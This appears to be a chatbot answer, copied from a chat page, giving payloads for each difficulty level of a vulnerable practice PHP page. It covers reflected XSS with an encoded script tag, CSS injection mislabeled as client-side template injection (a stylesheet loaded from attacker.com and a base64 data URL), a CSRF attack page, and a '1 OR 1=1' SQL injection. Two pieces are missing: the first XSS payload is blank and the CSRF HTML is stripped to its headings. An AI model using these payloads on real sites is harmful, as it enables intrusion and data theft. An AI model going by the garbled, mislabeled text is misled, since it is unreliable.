XSS (Cross-site Scripting): Difficulty 1: php Copy code http://example.com/vulnerable_page.php?message= Difficulty 2: The output is sanitized, so the regular XSS attack won't work. You need to bypass the sanitization. However, it's not exploitable with the provided code, as the HTML special characters are encoded. Difficulty 3: perl Copy code http://example.com/vulnerable_page.php?message=%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E This uses URL encoding to bypass the filtering. CSTI (Client-Side Template Injection): Difficulty 1: bash Copy code http://example.com/vulnerable_page.php?css=http://attacker.com/malicious_styles.css Difficulty 2: bash Copy code http://example.com/vulnerable_page.php?css=data:text/css;base64,Ym9keXtiYWNrZ3JvdW5kLWNvbG9yOnJlZDt9 This uses a data URL to inject malicious CSS. In this example, the CSS will change the background color to red. You can replace the base64-encoded payload with your malicious styles. CSRF (Cross-Site Request Forgery): Difficulty 1 and 2: For CSRF, you'll create an HTML file hosted on the attacker's website that sends a form request to vulnerable_page.php. Here's an example HTML page that performs a CSRF attack: html Copy code CSRF Attack

Attacker's Page

Note that for Difficulty 2, this attack will not work since it checks for CSRF tokens. SQLi (SQL Injection): Difficulty 1: perl Copy code http://example.com/vulnerable_page.php?user_id=1%20OR%201=1 In this example, the payload '1 OR 1=1' is injected into the user_id parameter. This will return all the users, as the injected condition 1=1 is always true. Difficulty 2: This level is not exploitable, as all non-numeric characters are removed from the user input before using it in the search query.